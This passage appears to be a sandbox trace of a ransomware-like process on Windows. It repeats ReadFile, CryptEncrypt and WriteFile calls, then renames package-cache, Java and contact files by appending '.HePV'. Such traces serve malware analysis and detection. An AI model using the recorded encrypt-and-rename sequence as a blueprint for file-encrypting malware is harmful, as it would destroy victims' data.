lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.113] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.113] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.113] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.116] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.116] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.116] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.116] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.116] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.117] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.117] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.117] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.117] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.117] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.117] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.117] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.117] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.117] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.117] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.117] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.117] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.118] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.118] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.118] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.118] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.118] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.118] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.118] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.118] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.118] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.118] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.119] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.119] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.119] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.119] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.119] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.119] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.119] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.119] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.119] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.119] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.119] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.119] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.119] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.119] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.119] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.120] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.120] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.120] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.120] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.120] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.120] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.120] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.120] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.120] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.120] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.120] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.120] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.120] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.120] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.121] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.121] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.121] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.121] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.121] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.121] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.121] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.121] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.121] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.121] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.121] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.121] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.121] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.121] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.122] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.231] MoveFileW (lpExistingFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.HePV" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.hepv")) returned 1 [0046.249] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0046.250] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0047.014] MoveFileW (lpExistingFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.HePV" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.hepv")) returned 1 [0047.029] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0047.029] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0047.774] MoveFileW (lpExistingFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.HePV" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.hepv")) returned 1 [0047.795] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0047.795] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0047.895] MoveFileW (lpExistingFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.HePV" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.hepv")) returned 1 [0047.903] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0047.904] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0048.463] MoveFileW (lpExistingFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.HePV" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.hepv")) returned 1 [0048.476] MoveFileW (lpExistingFileName="c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml"), lpNewFileName="c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml.HePV" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml.hepv")) returned 1 [0048.524] MoveFileW (lpExistingFileName="c:\\users\\default\\contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), lpNewFileName="c:\\users\\default\\contacts\\Administrator.contact.HePV" (normalized: "c:\\users\\default\\contacts\\administrator.contact.hepv")) returned 1 [0048.539] MoveFileW (lpExistingFileName="c:\\users\\default\\contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), lpNewFileName="c:\\users\\default\\contacts\\desktop.ini.HePV" (normalized: "c:\\users\\default\\contacts\\desktop.ini.hepv")) returned 1 [0048.552] MoveFileW 